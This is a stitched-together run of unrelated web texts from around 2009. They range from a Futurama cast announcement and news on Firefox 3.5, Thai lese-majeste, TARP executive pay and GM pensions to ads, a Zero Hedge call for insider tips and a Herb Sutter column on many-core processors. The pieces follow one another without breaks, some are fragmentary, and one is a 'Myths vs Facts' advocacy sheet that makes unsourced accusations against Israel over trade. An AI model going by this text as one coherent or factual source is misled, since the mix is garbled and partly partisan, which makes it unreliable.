Dear Futurama Fan ,
Thank you for voicing your strong support for Futurama and the original voice cast .
We appreciate the time you took to fire off a thoughtful and / or concerned and / or homicidal e-mail message to our casting director , Scott Muller .
( Rest assured , not a single one of these e-mails reached the actual decision - makers at 20th Century Fox Television .
For future reference , please note that Scott Muller is in fact one of Futurama 's biggest fans , and was instrumental in bringing about the return of the cast .
Please hoist a bottle of Olde Fortran for Scott ! )
Speaking of the cast returning ... good news , everyone !
The cast is returning !
All of our series regulars are back in action for Season 6 .
Billy West , Katey Sagal , John DiMaggio , Maurice LaMarche , Tress MacNeille , Lauren Tom , Phil LaMarr , and David Herman are all on board and have already begun delivering their customary virtuoso performances .
The all - new Futurama episodes are slated to air on Comedy Central beginning in June , 2010 .
We are extremely grateful for the outpouring of support for the series .
Your loyalty over the years has kept the show going through its original four seasons on FOX , its subsequent reincarnations on Adult Swim and DVD , and now its Bendiferous return to life on Comedy Central .
See you in the ( near ) future !
Sincerely , David X. Cohen & Matt Groening
The deal was sealed about 3 weeks ago , but somehow we missed it because of our myopic , obsessive focus on gadgets and only gadgets .
Who won that election everyone was talking about last fall , anyways ?
[ Thanks , Ivan ! ]
Myths vs Facts The US Trade Representative ( USTR ) negotiated the US - Israel Free Trade Area ( UIFTA ) in 1984 .
UIFTA became law in 1985 and some observers hail America 's first bilateral free trade agreement as a triumph in lowering barriers and boosting trade .
But as the 25th anniversary of UIFTA approaches and the economy continues to decline , many Americans question how beneficial this deal has been for the United States .
Americans have much cause for concern .
The agreement failed to deliver on most of the promised benefits .
Ongoing violations of American intellectual property rights and overseas crime financed by Israel 's access to US markets compound heavy losses of American jobs .
Myth : The US Israel Free Trade Area ( UIFTA ) delivers " mutual benefits " .
Fact : Since 1985 US trade with Israel shifted from a surplus to a cumulative $ 71 billion deficit ( adjusted for inflation ) .
The $ 7.8 billion US deficit with Israel in 2008 was equivalent to 126,000 US manufacturing related jobs .
UIFTA is the only such bilateral pact producing multi-billion dollar losses to the US every year for the last decade .
Myth : UIFTA is generally supported by US industries and associations .
Fact : During 1984 negotiations seventy - six leading American companies such as Monsanto , Dow Chemical , Sunkist , Hunt - Wesson Foods and organizations such as the AFL - CIO , American Farm Bureau and the US Bromine Alliance provided urgent testimony against the UIFTA .
Only seventeen organizations �most with no direct economic stakes in the proposed UIFTA �testified in favor .
More recently pharmaceutical , agricultural and other industry associations have continued to lobby against ongoing trade barriers erected by Israel .
Myth : The 1984 UIFTA negotiation process was open and fair .
Fact :
In 1984 the FBI investigated how the American Israel Public Affairs Committee ( AIPAC ) obtained during bilateral negotiations the classified official report containing trade secrets and other confidential business information of industries opposed to the UIFTA .
The International Trade Commission ( ITC ) later confirmed that the Israeli government also obtained a copy of the still - classified 300 page report .
The US industries most opposed to the UIFTA were its first victims .
In 1984 the Washington Post reported that the " report would give Israel a significant advantage in the trade talks because it discloses how far the United States is willing to compromise on contested issues .
Some of the proprietary information , moreover , could help Israeli businesses competing with U.S. companies . "
The Washington Post was right �UIFTA and subsequent epidemic of intellectual property violations has cost the US economy billions of dollars .
Myth :
The UIFTA promotes Middle East peace and regional stability .
Fact :
The UIFTA was conceived by Israel during the Reagan administration as a reward for its covert supplies of captured Palestinian arms to the Nicaraguan Contras in the early 1980 's �just as Congress began the Boland Amendment restrictions .
Israel , which was trying to reestablish its own arms sales to Iran after the 1979 Islamic revolution , later profited as the author and intermediary in the Reagan administration 's unsuccessful arms - for - hostages scheme which exploded into the " Iran - Contra " scandal .
With such antecedents it is unsurprising UIFTA has done little to produce peace in the Middle East .
In the 1990's US counter - intelligence agencies documented numerous instances of Israeli copycat US weapons systems sales to rogue nations such as Iraq .
Currently , Israeli cut diamond exports to the United States under UIFTA fund destabilizing illegal West Bank settlements .
Myth : The US - Israel Free Trade Agreement strengthens global rules based trade .
Fact : Israel has been on the USTR 's punitive " watch list " for the past four years .
Top industry and government concerns include Internet music and software piracy , ongoing industrial espionage targeting the US for trade secrets and systematized misuse of patented US pharmaceutical innovations by Israeli generic drug exporters in collusion with the Israeli Ministry of Health .
A better plan needed for 4 - year - old panhandler
A woman identified as Toni Mills sits in front of an empty flower stand on Market Street in San Francisco , Calif. , on Friday , July 17 , 2009 .
A woman identified as Toni Mills sits in front of an empty flower stand on Market Street in San Francisco , Calif. , on Friday , July 17 , 2009 .
Photo : The Chronicle Photo : The Chronicle Image 1 of / 4 Caption Close A better plan needed for 4 - year - old panhandler 1 / 4 Back to Gallery
Little Gavin Mills , the 4 - year - old panhandler who evoked so much sympathy and concern from San Franciscans , has been taken from his parents by Child Protective Services .
It is an incredibly difficult decision to take a child away from his mother and father , but in this case it is the right choice .
" Gavin deserves a chance in life , " said Mary Long , who began a crusade to improve Gavin's and his mother Toni 's life after seeing them at the Embarcadero BART Station .
" He was n't getting one being used as a panhandler tool by his chronically homeless mom . "
City officials say the family was repeatedly offered beds , services and child care .
But their offers , they say , were rebuffed , and people like Long kept seeing Gavin panhandling .
Gavin 's parents , Eric and Toni , came to The Chronicle Friday to complain about columns I 've written about Gavin .
They would not speak on the record , but their point was that they love their son and are making every effort to get him back .
Erica Kisch is executive director of Compass Community Services , which works with homeless families .
She said panhandling can earn quick cash whereas the wait to get housing can take months .
Christi Foist , a commuter from the East Bay , tried to connect the family with a friend in a church charity group .
When that did n't work out , in January she cashed in JetBlue tickets to fly all three of them back to West Leechburg , Pa. , where Eric 's parents , Tom and Florence Mills , live .
Florence said when they arrived she was hoping to get some help for the family and that they could stay with them .
She said they 'd take Gavin , but health issues make that impossible .
" When Gavin came into my house his eyes got so big , " said Florence .
" He said , ' It 's beautiful . '
We did our best to get them into a place .
They 'd say , ' We do n't need no help . '
We said , ' Yes , you do . ' "
After a few days Florence says Toni took Gavin to visit a friend and then they vanished .
Foist said she thought getting the Millses back home would help solve their problems , then was shocked to see them in April .
Foist and Long say Toni told them that Eric was unable to find work in Pennsylvania and had to return to the Bay Area for better prospects .
But frankly , it is very hard to know what to believe .
Often the stories do n't add up and sometimes they turn out to be outright lies .
Friday I spotted Toni panhandling on Market Street , with a sign that said , " Stranded .
Homeless .
Please Help . "
I asked her where Gavin was .
" He 's in summer camp , " she said promptly .
No , he 's not .
He is being evaluated for a foster home .
This is an intervention .
There will be a hearing later this month to determine if Gavin can stay with his mother and father .
They need to show that they have a better plan for him than panhandling on Market Street .
“ The problem is we have so many stupid enterprises , ” said Li Junfeng , who is the deputy director general for energy research at China ’s top economic planning agency and the secretary general of the government - run Renewable Energy Industries Association .
HSBC predicts that China will invest more money in renewable energy and nuclear power between now and 2020 than in coal - fired and oil - fired electricity .
Image
One of the largest wind farms is being built near Dunhuang .
That does not mean that China will become a green giant overnight .
For one thing , Chinese power consumption is expected to rise steadily over the next decade as 720 million rural Chinese begin acquiring the air - conditioners and other power - hungry amenities already common among China ’s 606 million city dwellers .
As recently as the start of last year , the Chinese government ’s target was to have 5,000 megawatts of wind power installed by the end of next year , or the equivalent of eight big coal - fired power plants , a tiny proportion of China ’s energy usage and a pittance at a time when China was building close to two coal - fired plants a week .
But in March of last year , as power companies began accelerating construction of wind turbines , the government issued a forecast that 10,000 megawatts would actually be installed by the end of next year .
And now , just 15 months later , with construction of coal - fired plants having slowed to one a week and still falling , it appears that China will have 30,000 megawatts of wind energy by the end of next year  which was previously the target for 2020 , Mr. Li said .
A big impetus was the government ’s requirement , issued in September 2007 , that large power companies generate at least 3 percent of their electricity by the end of 2010 from renewable sources .
The calculation excludes hydroelectric power , which already accounts for 21 percent of Chinese power , and nuclear power , which accounts for 1.1 percent .
The following article is reprinted from the Security Alert blog at PCWorld.com .
A critical flaw in the way Firefox 3.5 handles Javascript opens the door to a serious attack , according to Secunia , which tracks security vulnerabilities .
Sample exploit code is already available online , so while there are n't yet any reports of active attacks against this new flaw , there soon could be .
Such an assault would likely take the form of a poisoned Web page that uses behind - the - scenes attack code to trigger the flaw .
The Washington Post 's Security Fix has posted a workaround to protect against the flaw while Mozilla prepares a patch .
The temporary fix disables a new Javascript processing feature in Firefox 3.5 , which Security Fix says will slow down Javascript handling but protect against this exploit .
See Brian Krebs ' post for instructions .
Firefox 3.0 users who have n't yet upgraded should n't be vulnerable to this flaw , and wo n’t find the setting that Krebs describes .
This story , " Firefox 3.5 vulnerable to critical Javascript attack " was originally published by PCWorld .
The Gymbox is a Photo page of artistic elite gymnastics
The pictures have been taken by Jasmin Schneebeli - Wochner ( 1999 til now ) and Christian Ballat ( 1999 - 2005 )
For private or professional use please contact us .
New book Europeans , Berne 2016 by Jasmin 52 pages full color lay flat , hardcover , DIN A 4 ( 21x28 cm )
Preise : CH 55 .- sFr + 8 sFr Versand
D 50 .- Euro + 5 Euro Versand
World 50 Euro / Dollar + 10 Euro / Dollar postage
Schweiz für 1 Buch , ansonsten bitte über Email
Deutschland
Stückzahl 1 Buch 55.00 EUR 2 Bücher 110.00 EUR 3 Bücher 160.00 EUR
Europe / World
Stückzahl 1 book 60.00 EUR 2 books 120.00 EUR 3 books 170.00 EUR
Das ganze Schweizer Team ist im Buch vertreten , Junior / innen und Senior / innen
Giulia Steingruber , Pablo Braegger , Ilaria Kaeslin , Benjamin Gischard , Christian Baumann , Samir Serhani , Henji Mboyo , Oliver Hegi , Eddy Yusof , Andreas Gribi , Noe Seifert , Moreno Kratter , Stefanie Siegenthaler , Livia Schmid , Caterina Balrloggio , Leonie Meier , Lynn Genhart , Anina Wildi
Internationale Turner und Turnerinnen im Buch :
Frauen
Aliya Mustafina , Daria Spiridonova , Angelina Melnikova , Ksenia Afanasyeva , Anastasia Iliankova , Elena Eremina , Uliana Perebinosova , Angelina Simakova , Maisie Methuen , Becky Downie , Megan Parker , Denisa Golgota , Catalina Ponor , Ioana Crisan , Lara Mori , Kim Bui , Emma Hoefele , Maellyse Brassart , Marine Boyer , Oreane Lechenaut , Dorina Boeczoego , Sanna Veerman
Männer
Oleg Verniaev , Marian Dragulescu , David Belyavskiy , Nikolai Kuksenkov , Denis Ablyazin , Nikita Nagorny , Daniel Purvis , Nile Wilson , Courtney Tulloch , Kristian Thomas , Gianni- Regini Moran , Marcel Nguyen , Sebastian Krimmer , Cameron - Lie Bernard , Eleftherios Petrounias , Samuelis Sorochovas
Offizielle
More Info about this Invention :
Share on
Despite it 's name , the Cyberknife is not a real knife .
The robot , which looks strikingly similar to a auto manufacturing robot , is a radiotherapy machine that can work with such precision that it can move around while the patient breathes .
The treatment is claimed to be so accurate that it is now possible to be able to treat tumours that were previously thought to be inoperable .
Because the treatment is not invasive , complications that are normally associated with surgery are eliminated , as is the need for a long recovery time .
What this means is that there is now a new treatment option for patients who are not well enough to undergo surgery .
Additionally , most patients can leave the clinic the same day as their treatment .
Female
Thai activist sentenced to 18 years for ' insulting the monarchy '
A Thai court has sentenced a political campaigner to 18 years in prison for insulting the monarchy .
The trial is the latest in a slew of lese - majeste cases that critics say are stifling dissent and freedom of speech .
The Bangkok Criminal Court handed the harsh sentence to Darunee Charnchoengsilpakul , a 'red shirt ' supporter of ousted former premier Thaksin Shinawatra .
She was convicted of three counts of royal insults , each with a six - year sentence .
Outspoken activist Darunee Charnchoengsilpakul was sentenced to 18 years in jail today for insulting the monarchy
' The court finds she intended to insult and make threats to the king and the queen , ' one of the three judges said , reading the verdict .
Darunee , 46 , also known as ' Da Torpedo ' , was arrested in July last year after delivering an exceptionally strong speech about the 2006 coup that ousted Thaksin .
' It is what I expect to happen , ' she told reporters after the verdict .
' I will appeal . '
Lese - majeste , or insulting the monarchy , is a very serious offence in Thailand , where many people regard 81 - year - old King Bhumibol Adulyadej as semi-divine and above politics .
The trial , which began in June , had been held behind closed doors ' for reasons of national security ' , which rights group Amnesty International said could jeopardise her chances of receiving a fair hearing .
Prior to her first hearing , Darunee said her speech was aimed at the generals who ousted former telecommunications tycoon Thaksin , who lives in self - imposed exile after his conviction on conflict of interest charges .
She insisted she had made no attempt to topple the monarchy and that she supported ' a sustainable monarchy like in the United Kingdom and Japan ' .
Critics of the lese - majeste law say it is open to abuse since a complaint can be filed by anybody against anybody , no matter how minor the alleged disrespect .
The law has been a regular feature of the charged political atmosphere in Thailand in the past three years .
The generals who overthrew Thaksin cited his alleged disrespect for the monarchy among other reasons .
Prime Minister Abhisit Vejjajiva has said he wants to strike a balance between upholding the law and freedom of expression , but critics say little has changed .
Learning
The Quran Online has been one of most helpful and effective procedures that assist Muslims all around the world about the teaching of Quran and about Islam .
The motive of our institute is to provide Qur’an lesson classes in an easy and flexible way to kids and elders at their home , it ’s easier than you can think .
Now you and your kids can gain the knowledge of Islam at their home in front of your eyes , so no need to drive your kids far away to a mosque to learn Quran with Tajweed .
We can help you to read Quraan with proper rules of Tajweed and improve your recitation of Quran .
Alhamdulillah since 2005 thousands of people have finished and memorized the holy Qur’an from our institute .
It does not matter that how young or old you are or if you are a beginner , with the help of our highly qualified tutors we will start guiding you from basic Noorani Qaida lessons gradually improving to the higher level of Tajweed .
Our institute has the most effective program of learning Quran through internet .
More than 5000 students have benefited through it and many are benefiting , Learn Quran On Skype with us .
You want to give it a try and see how these online classes so register now for free 1 week trial and see for your own self call us now on 001 201 7938133 for any assistance .
Radiohead are releasing a song dedicated to Harry Patch
Radiohead frontman
Thom Yorke has said recording another album would " kill " the band because making records has become a " real drag " to them .
Speaking to US magazine The Believer , the singer said their last release , In Rainbows , worked because the group had a clear vision for the record .
" None of us want to go into that creative hoo - ha of a long - play record again .
Not straight off , " he said .
The band may start releasing one - off songs rather than full - length albums .
' Profound effect '
Yorke said making an album was hard , but it worked with their last record , because " we had a fixed idea about where we were going " .
He added : " But we 've all said that we can't possibly dive into that again .
It 'll kill us . "
Radiohead 's latest song was written in honour of Harry Patch , the First World War veteran who died last month aged 111 .
The download only single , Harry Patch ( In Memory Of ) , was inspired by a radio interview with the former soldier recorded in 2005 .
Yorke said : " The way he talked about war had a profound effect on me .
" It became the inspiration for a song that we happened to record a few weeks before his death .
" I very much hope the song does justice to his memory as the last survivor . "
All profits of the song , which was premiered on BBC Radio 4 's Today programme last week , will go to the Royal British Legion .
Critical update :
FINRA
CDS
eavesdropping
blonde
th
CDO
sell - side
( and yes , you all know who you are )
just a
little
And a word of warning
major
whistleblower
disassemble
FINRA
Denninger
neither the SEC nor FINRA have done anything
watercooler
now at over 240 supporter
ZH
FOIA
algo
Zero
Hedge thrives on its proactive readers , yet I never expected a barrage of information such as the one I received since posting this .
In the hundreds of emails received over the past several hours , much of it from current industry insiders , a substantial portion is likely actionable , and upon further refinement , enforceable .
Going through it all will take time , however I take this opportunity to welcome any and all readers to provide information they believe captures wrongdoing in the financial system - in the absence of objective , unbiased and fair external regulators , it is the responsibility of everyone , but most notably insiders , to cleanse the system .
Zero Hedge will filter the data and forward our work product directly to appropriate Attorney General offices and local FBI branch offices .
In retrospect , approaching the SEC andis futile , as they are both as much an integral part of the system as the perpetrators they are supposed to protect against .
We 're slowly learning that fact .
And we are very , very pissed off .
So ... Deartrader talking on the phone to your sales coverage discussing insider information on a deal while your bored analyst is ... Dear Senior Vice President at the strip club boasting to your subordinates how you misspent tens of thousands of taxpayer and investor dollars on strip clubs and prostitutes currying favor for the client , to catch that elusive multi-million deal so you can buy the third vacation home you will never frequent ... Dear General Counsel receiving sexual favors from theassistant in exchange for promises of advancement that never come ... Dear Chief Executive
Officer having an affair with the lady at the cosmetics section in that 5 Avenue store , while your wife and 3 children wait at home ... Dear retail broker guaranteeing your 70 year old client that investing in this particular BBB + ratedwill never lose money , just to hurry up and do the trade in the next 5 minutes ... Dearanalyst telling your equity salesmen over shots of Grey Goose at Marquee just how crappy the REIT that you just upgraded is ...... Please look well around you , and pray that you did not piss off any of the people close to you , who know every move you make , and every word you speak ... sleep well tonight , because tomorrow your face just may make the proverbial front page of the Wall Street Journal ... or Zero Hedge if the former isconflicted .- please be prudent in contacting us .
Aformer investment bank , now bank holding company , has retaliated against an employee for daring to contact Zero Hedge .
No more information will be disclosed at this point , out of respect for what will likely be a majorlawsuit .
But please do not let that happen to you - after all the only way tothe machine is from the inside .*** Sinceand the Securities and Exchange Commission believe in going only after $ 1,000 insider traders with the full weight of their enforcement teams , yet ignore major market manipulation in futures and other markets , Zero Hedge wanted to present readers an opportunity to be heard by the market 's regulators .
As to what specific event to reference , frequent readers do not need our prompting , however a good example which if nothing else , needs clarification , is the major odd / ES ramp up on no news two nights ago , ahead of the atrocious claims number , which was covered extensively by Karlat Market Ticker Additionally , the phenomenal spike in call option volume two months ago in insurance companies before it was announced they would all become eligible for TARP was about as fraudulent as one can imagine and yetto address that obvious market manipulation .
And of course the major news leaks and resulting stock moves just ahead of every bank follow - on equity offering are by nowjokes when discussing just which zoo it is that the regional SEC enforcement officer must has escaped from .
Remember , the voice of the masses does not go unnoticed : the amazing grass roots support for HR1207 is the main reason the " Audit The Fed " bill generated not only enough co-sponsors to pass congressional voting , but iss - a staggering result for a bill that only had 160 supporters the week before Zero Hedge decided to take the issue public .
Also , numerousrequests have proven successful mostly due to material reader support and participation .
Which is why we recommend that all readers who feel like they would like to invest money in a market that is nothing less than a swing - trading casino , manipulated exclusively by several major players , and where cash trading is pointless due to the growing preponderance of program andtrading , click on this link , and voice your displeasure directly to the SEC about all concerns you may have , both public and private .
MARTHA’S VINEYARD , MASSACHUSETTS ( Reuters ) - Kenneth Feinberg , the Obama administration ’s pay czar , said on Sunday he has broad and “ binding ” authority over executive compensation , including the ability to “ claw back ” money already paid , and he is weighing how and whether to use that power .
Kenneth Feinberg , the Obama administration 's pay czar , in an undated photo .
REUTERS / Handout
Feinberg told Reuters that Citigroup Inc included the contract of energy trader Andrew Hall in submissions due Friday by seven major companies still locked in the federal government ’s TARP Program .
Feinberg said he has n’t looked at Hall ’s contract , which reports have said could pay him as much as $ 100 million this year .
“ Whether I have jurisdiction to decide his compensation or not , we will take a look and decide over the next few weeks , ” Feinberg said after speaking at a public forum in Martha ’s Vineyard , Massachusetts , part of a newsmaker series hosted by the Martha ’s Vineyard Times newspaper .
Feinberg has been consulting with seven companies that have yet to pay back money they borrowed from the government , including Citi , American International Group Inc , Bank of America Corp , Chrysler Financial , Chrysler Group LLC , General Motors Co and GMAC Inc .
Those companies faced a deadline of Friday of submitted proposals to Feinberg for their top 25 employees .
Feinberg said on Sunday that decisions he makes will be “ binding , ” but the law limits his power over contracts signed before February 11 , 2009 .
He also said he has the authority to use a “ clawback ” provision to go after compensation for executives from any company that received money from the U.S. Treasury ’s Troubled Asset Relief Progr.am ( TARP ) .
“ I have the discretion , conferred upon by Congress , to attempt to recover compensation that has already been paid to executives not only in these companies , but in any company that received federal assistance , ” Feinberg said during his remarks .
Asked by Reuters if he could use that ability to target a firm like Goldman Sachs Group Inc , which paid back $ 10 billion in bailout money , Feinberg said : “ Anything is possible under the law . ”
“ I can claw back , but we have n’t focused on that at all , ” he said .
“ TOUGH DISAGREEMENTS ”
Feinberg said he has been advising the seven firms under his jurisdiction on a daily basis , characterizing the meetings as “ very amicable . ”
“ There have been some tough disagreements , but everyone is trying to get to an end place in compensation that makes sense in a post - TARP world , ” Feinberg said .
Citigroup , in particular , has concerns about pay restrictions causing its top employees to leave , Feinberg said .
“ Citibank says if you do n’t pay us x or y , the going rate for our senior officials , they will leave , ” Feinberg said .
“ They will go to Goldman Sachs .
They will go to JPMorgan Chase & Co. Worse , they ’ll go to UBS or the Royal Bank of Scotland , or foreign banks . ”
Feinberg said the law requires him to take market forces into account , but also to consider performance and past deals between a company and an employee .
“ The statute provides these guideposts , but the statute ultimately says I have discretion to decide what it is that these people should make and that my determination will be final , ” Feinberg said .
“ The officials ca n’t run to the Secretary of Treasury .
The officials ca n’t run to the court house or a local court .
My decision is final on those individuals , ” Feinberg added .
Feinberg told Reuters he has n’t spoken with President Obama about his role as the administration ’s watchdog on pay , although he has been in touch with Treasury Secretary Timothy Geithner .
Feinberg , who also served as the special master over the Federal September 11th Victim Compensation Fund and the Virginia Tech shooting fund , said compensation was an “ emotional issue , but it does n’t rise to the level of those cases . ”
The credit crunch has been brutal for solar start - ups in the West , but not for Chinese firms with access to almost free finance from the state banking system .
They have taken advantage of the moment to flood the world with solar panels , driving down the retail price from $ 4.20 per watt last year to nearer $ 2 in what some say is a cut - throat drive for market share .
Mr. Wagoner ’s retirement package was one of the unanswered questions when the Treasury formed the General Motors Company from assets of the former G.M. last week .
After his ouster , Mr. Wagoner remained on the payroll , earning a salary of $ 1 a year .
Image Rick Wagoner was originally eligible for $ 20.1 million .
Credit ... Stan Honda / A.F.P. — Getty Images
Mr. Wagoner , 56 , will also receive a life insurance policy that G.M. has maintained for his benefit since Jan. 1 , 1997 , or its cash value , now $ 2.57 million , the firm said in the filing .
He worked for G.M. for 32 years .
His original pension included a $ 68,900 yearly amount and five annual payments of $ 4.5 million .
A Warning on Old G.M. Stock
Investors in the old General Motors have been warned by the government .
But will they listen ?
The old G.M. stock , now almost certainly worthless , was a star performer during the bankruptcy proceeding of General Motors , when it traded under the ticker symbol GMGMQ .
From 75 cents a share on May 29 , before the company filed for bankruptcy , the shares rose to $ 1.15 before trading was halted on Friday by alarmed regulators who feared heavy volume in the stock might show that investors believed it was in some way connected to the new General Motors .
It is not .
Iraqi journalist who hurled shoe at Bush gets early release for good behaviour
Iraqi journalist Muntazar al - Zaidi , who became a star in the Arab world when he hurled his shoes at visiting US President George W. Bush and called him a dog
The Iraqi journalist jailed after hurling his shoes at former President George W. Bush , will be released next month after his sentence was reduced for good behaviour .
Muntadhar al - Zeidi’s act during Bush ’s last visit to Iraq as President turned the 30 - year - old reporter into a folk hero across the Arab world , amid growing anger at the 2003 invasion .
He has been in custody since the outburst on December 14 last year during a Bush news conference .
The President was forced to duck for cover as the journalist shouted in Arabic :
‘ This is your farewell kiss , you dog !
This is from the widows , the orphans and those who were killed in Iraq . ’
His lawyer , Karim al - Shujairi , said : ‘ His release will be a victory for the free and honourable Iraqi media . ’
Nuri al - Malik , Iraq 's Prime Minister trying to block George W. Bush from being hit with a pair of shoes
Herb Sutter is a bestselling author and consultant on software development topics , and a software architect at Microsoft .
He can be contacted at www.gotw.ca.
Dual - and quad - core computers are obviously here to stay for mainstream desktops and notebooks .
But do we really need to think about " many - core " systems if we 're building a typical mainstream application right now ?
I find that , to many developers , " many - core " systems still feel fairly remote , and not an immediate issue to think about as they 're working on their current product .
This column is about why it 's time right now for most of us to think about systems with lots of cores .
In short : Software is the ( only ) gating factor ; as that gate falls , hardware parallelism is coming more and sooner than many people yet believe .
Recap : What " Everybody Knows "
Figure 1 is the canonical " free lunch is over " slide showing major mainstream microprocessor trends over the past 40 years .
These numbers come from Intel 's product line , but every CPU vendor from servers ( e.g. , Sparc ) to mobile devices ( e.g. , ARM ) shows similar curves , just shifted slightly left or right .
The key point is that Moore 's Law is still generously delivering transistors at the rate of twice as many per inch or per dollar every couple of years .
Of course , any exponential growth curve must end , and so eventually will Moore 's Law , but it seems to have yet another decade or so of life left .
Mainstream microprocessor designers used to be able to use their growing transistor budgets to make single - threaded code faster by making the chips more complex , such as by adding out - of - order ( " OoO " ) execution , pipelining , branch prediction , speculation , and other techniques .
Unfortunately , those techniques have now been largely mined out .
But CPU designers are still reaping Moore 's harvest of transistors by the boatload , at least for now .
What to do with all those transistors ?
The main answer is to deliver more cores rather than more complex cores .
Additionally , some of the extra transistor real estate can also be soaked up by bringing GPUs , networking , and / or other functionality on - chip as well , up to putting an entire " system on a chip " ( aka " SoC " ) like the Sun UltraSPARC T2 .
How Much , How Soon ?
How quickly can we expect more parallelism in our chips ?
The naïve answer would be : Twice as many cores every couple of years , just continuing on with Moore 's Law .
That 's the baseline projection approximated in Figure 2 , assuming that some of the extra transistors are n't also used for other things .
However , the naive answer misses several essential ingredients .
To illustrate , notice one interesting fact hidden inside Figure 1 .
Consider the two highlighted chips and their respective transistor counts in million transistors ( Mt ) :
4.5Mt : 1997 " Tillamook " Pentium P55C .
This is n't the original Pentium , it 's a later and pretty attractive little chip that has some nice MMX instructions for multimedia processing .
Imagine running this 1997 part at today 's clock speeds .
1,700 Mt : 2006 " Montecito " Itanium 2 .
This chip handily jumped past the billion - transistor mark to deliver two Itanium cores on the same die . [ 1 ]
So what 's the interesting fact ?
( Hint : 1,700 ÷ 4.5 = ???.)
In 2006 , instead of shipping a dual - core Itanium part , with exactly the same transistor budget Intel could have shipped a chip that contained 100 decent Pentium - class cores with enough space left over for 16 MB of Level 3 cache .
True , it 's more than a matter of just etching the logic of 100 cores on one die ; the chip would need other engineering work , such as in improving the memory interconnect to make the whole chip a suitably balanced part .
But we can view those as being relatively ‘ just details ' because they do n't require engineering breakthroughs .
Repeat : Intel could have shipped a 100 - core desktop chip with ample cache -- in 2006 .
So why did n't they ?
( Or AMD ?
Or Sun ?
Or anyone else in the mainstream market ? )
The short answer is the counter - question :
Who would buy it ?
The world 's popular mainstream client applications are largely single - threaded or nonscalably multithreaded , which means that existing applications create a double disincentive :
They could n't take advantage the extra cores , because they do n't contain enough inherent parallelism to scale well .
They would n't run as fast on a smaller and simpler core , compared to a bigger core that contains extra complexity to run single - threaded code faster .
Astute readers might have noticed that when I said , " why did n't Intel or Sun , " I left myself open to contradiction , because Sun ( in particular ) did do something like that already , and Intel is doing it now .
Let 's find out what , and why .
The long awaited second season of the Melancholy of Suzumiya Haruhi has begun , secreted in the midst of a rerun of the first season , and as revealed earlier is the new “ Bamboo Leaf Rhapsody ” episode .
What remains of Haruhi fandom has exploded , and 2ch entered into meltdown mode with hundreds of posts a minute .
You can see something of the episode below :
The repeated leaks of broadcast schedules seem almost almost too convenient …
Quite possibly a deliberate effort
All that remains to be seen is whether the marketing debacle ( or “ innovative viral marketing strategy ” , as Kadokawa will doubtless like to think of it ) succeeds in recouping something of the huge popularity the series once enjoyed now that the age has apparently shifted to K - ON !
With the rapid adoption of social media , we have accelerated into a network economy .
In a network economy , connectivity enables value to be created and shared by network members .
The larger the network , the greater the potential benefits .
In the digital world , network activities take place on an open platform that enables participation and cloud computing ( think Wikipedia and widgets ) .
In networks , some members are more connected and active , and therefore have more influence .
These influentials are important members because they add significantly more value to the network .
In the digital world , they blog , twitter , upload videos , experiment with new gadgets , and create widgets .
As early adopters , they tend to be trendsetters that are followed by their friends and sometimes the masses .
The book , the Whuffie Factor , talks about Social Capital , and how our society is increasingly motivated to become more useful and creative .
Today , more people want to be influencers , and they want to be enabled .
In 2009 , Twitter has emerged as one of the most talked about platforms in the network economy .
Indeed , there is a simple network exchange on Twitter : influencer creates bite - size content , and follower discovers new information .
Here are a few examples of the exchange :
• Gavin Newsom , mayor of San Francisco and California Governor Candidate , has over 500,000 followers .
He keeps his followers informed about upcoming events and fundraising , and enables them to interact with him directly .
• Mike Massimino , a NASA astronaut , has over 400,000 followers .
He combines his human life story with a behind the scenes look at being an astronaut .
• And of course there is Oprah , approaching 1.4 million followers .
Twitter makes it easy to share your voice and build your presence in the community .
RegularGeek ’s comment sums up the value : “ Even someone like myself , and I do not have a huge social media presence , can talk to and possibly influence about five thousand people .
If I have two thousand subscribers on the blog , Twitter , FriendFeed and Facebook , the number of unique people could be around 5,000 .
That is direct contact , and the network effects could create an audience much larger . ”
While we are all familiar with Twitter , there are many more communities that engage and enable an influential audience with network principles .
One of the key elements of a network is the idea of reciprocity .
The idea of “ I win , you lose ” does n’t work in a network , or it will fall apart .
Instead , there must be mutual win-win exchanges .
One such example is at Triggerstreet , was founded in 2002 by Academy Award Winner Kevin Spacey , which is a community for emerging artists .
The promise of the network is to democratize exposure and offer a career boost through a network of peers who review your work , rate it , and provide feedback .
Further , the network has engaged influentials in the form of participating judges , including Michael Myers , Sean Penn , Snoop Dog , Sheryl Crow , and Liv Tyler .
It is this very concept of participation by influentials that is becoming increasingly important with each passing day .
In our world of choice and overcapacity , influentials are an important element of the decision making process .
As we de-emphasize paid media such as television commercials and print ads , the power of earned media and word of mouth is amplified .
As you consider new ways to share your story and build your reputation , learn from entrepreneurial initiatives that listen to and engage the influentials .
Our first example is Jodangle which helps you listen to and monitor the online chatter by influentials .
In an environment where influential content originates from an exploding number of information sources , Jodange provides intelligence on who and what is influencing customers , competitors , and the overall marketplace .
In April 2009 , Jodangle received $ 1.2 million of investments .
Our second and third examples are currently in development at DreamIt Ventures , which helps entrepreneurs launch their ventures and build great companies .
Trendsta is a new way for trendsetting teens to test and review the latest hot products .
Like BuzzAgent , the principal is that word - of - mouth marketing is powerful .
Trendsta has even more of a laser focus on the influentials by engaging trendy teens in the digital world .
Our final example is Scribnia , which is a rating and discovery engine for bloggers and columnists .
Much like Triggerstreet , the promise is to build an influential community that is engaged in sharing creative work and providing feedback .
Consider your role in the network economy .
How you are going to add value to and expand your network ?
As you build your presence and your reputation , listen to the conversation around you , pursue authentic participation , and engage influentials who can amplify your message .
Photo by Stefanie L. , from Stock .
Xchng
It 's been a big week for databases , although nobody has managed to make them sexy .
On Monday , the pressure group Liberty underlined the failings of the Criminal Records Bureau – more precisely its enhanced check – for the Today programme .
It was quite a story : a woman had been turned down for voluntary work , having been " spoken to " ( as opposed to " reprimanded " or " warned " ) by police for leaving her children in the park while she went to the shops .
It 's one of those stories you can imagine Basil Fawlty popping an eyeball over .
And then you think , hang on – I 'm popping an eyeball .
This is outrageous .
She only went to the shops .
This evening Damian Green , the shadow immigration minister , gave a speech to the Centre for Policy Studies , asking if Britain is a free country .
He identifies 28 agencies that hold personal data about individuals .
In the light of his very credible starting position – that politicians have a duty to create an environment in which " the citizen has some personal space in which the state has no power , interest , or influence " – many of these agencies and their purview do seem … well , bogus is a strong word .
Let 's start with " a bit much " .
The Tories have seized this ground – they are tighter with Liberty than is Labour ; and there is no telling whose manifesto will promise the most in terms of individual privacy .
It 's not a bad time , therefore , to look at database management as practised by the Criminal Records Bureau , which is as uncontroversial and hi-tech as any similar initiative of the past three terms of government .
